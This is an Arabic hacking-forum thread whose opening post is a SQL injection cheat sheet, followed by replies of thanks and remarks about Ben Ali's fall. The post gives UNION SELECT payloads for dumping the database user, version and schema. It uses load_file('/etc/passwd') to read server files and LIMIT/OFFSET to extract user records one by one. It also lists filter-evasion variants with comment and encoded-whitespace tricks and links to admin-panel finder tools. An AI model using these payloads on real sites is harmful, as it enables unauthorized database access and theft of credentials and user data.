اليوم حبيت أضع الأوامر التي تستخدم في الحقن مع شرح عدد الأعمدة لتسهيل الحقن 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23, 24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49 ,50,51,52,53,54,55,56,57,58,59 ,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77 ,78,79,80,81,82,83,84,85,86,87 ,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104 ,105,106,107,108,109,110,111 ,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125 ,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45 ,146,147,148,149,150,151,152,153 ,154,155,156,157,158,159,160,161,162,163,164,165 ,166,167,168,169,170,171,172,173,174 ,175,176,177,178,179,180,181,182,183,184,185,186 ,187,188,189,190,191,192,193,194,195 ,196,197,198,199,200,201,202,203,204,205,206,207 ,208,209,210,211,212,213,214,215,216 ,217,218,219,220,221,222,223,224,225,226,227,228 ,229,230,231,232,233,234,235,236,237 ,238,239,240,241,242,243,244,245,246,247,248,249,2 50 ,251,252,253,254,255,256,257,258 ,259,260,261,262,263,264,265,266,267,268,269,270,2 71 ,272,273,274,275,276,277,278,279 ,280,281,282,283,284,285,286,287,288,289,290,291,2 92, 293,294,295,296,297,298,299,300 ################################################## ############################ user() :لمعرفة مستخدم قاعدة البيانات يساعدك في التخمين على PhpMyAdmin version() : معرفة الاصدار 4 أو 5 database() : اسم القاعدة @@datadir :مكان تواجد قاعدة البيانات load_file('/etc/passwd') : لقراءة ملف المستخدمين لسيرفر و هي تكون فعالة في 30% من الحالات حسب تقديري الخاص بشرط يكون magic quotes=OFF concat(user(),0x3c62723e,@@version,0x3c62723e,data base()) أمر استخراج القاعدة و اليوزر و نسخة القاعدة ################################################## ############################## +order+by+ : معرفة عدد الأعمدة +union+select+ : دالة الربط لتطبيق الأوامر ############################################ أوامر استخراج الجداول concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema) concat_ws(0x3a3a3a,table_name,column_name) concat(column_name,0x3a,table_schema,0x2e,table_na me) أوامر استخراج الجداول والأعمدة التي تبدأ لكلمة مثل user admin وتكتب بين قوسي CHAR ويتم يشفيرها قبل ذلك group_concat(column_name,0x3a,table_schema,0x2e,ta ble_name)+from+information_schema.columns+where+co lumn_name+like+char() أمر التنقل بين المعلومات المستخرجة يعني لو أنت تحقن موقع فيه أكثر من ييزر هذا الأمر يسمح لك باستخراجهم واحدا واحدا كهذه الطريقة limit+2,2+offset+ ... limit+1+offset+ limit+1+offset+ .... limit+1+offset+ union+all+select+ دالة الربط لتطبيق الأوامر ويسمح لك بالتخطي بعض الفلترات بعد طرق تخطي الفلترة hex(unhex() AES_ENCRYPT() AES_ENCRYPT(). UnIOn+AlL+SeLEcT /**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1 /**/UNION/**/SELECT/**/1,2,3,CONVERT(concat_ws(0x3a,table_schema,table_na me,column_name) USING latin1),5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/* / ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / * /*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / * + UNION+ select + 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from + INFORMATION_SCHEMA.COLUMNS+LIMIT + 180,1 %09 UNION%09 select %09 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %09 from %09 INFORMATION_SCHEMA.COLUMNS%09 LIMIT %09 180,1 %0A UNION%09 select %0A 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %0A from %0A INFORMATION_SCHEMA.COLUMNS %0A LIMIT %0A 180,1 ################################################## ################################################## #### مواقع تخمين لوحات التحكم http://flashcrew.in/t00ls/admin/ http://revtan.site40.net/admin/ http://mavia-haxx0r.co.tv/admin http://mhg-ks.org/web/tools/@x=findl0ginp4g3.html
مشكوررررررررررررررررررررر رررررررر
يسقط بن علي وتبقى الحرية لتونس
شكرا على المرور
المشاركة الأصلية كتبت بواسطة cho3la يسقط بن علي وتبقى الحرية لتونس ههههههههههههههههههه تسلم حبيبي بن علي سقط و طااااااار هههههههههههههه
MaSHkooor Ya PrinCe
منور حبيبي
سلمت يمناااك والله يعطيك العافيه دائما متألق ومتميز دمت في حفظ المولى
إن المحبة الصادقة كعلاقة اليد بالعين إذا تألمت اليد دمعت العين وإذا دمعت العين مسحتها اليد
تسلم حبيبي و الله منور الموضوع و مشرفني بمرورك
مشكؤؤؤؤؤؤؤؤؤؤؤؤؤر
قوانين المنتدى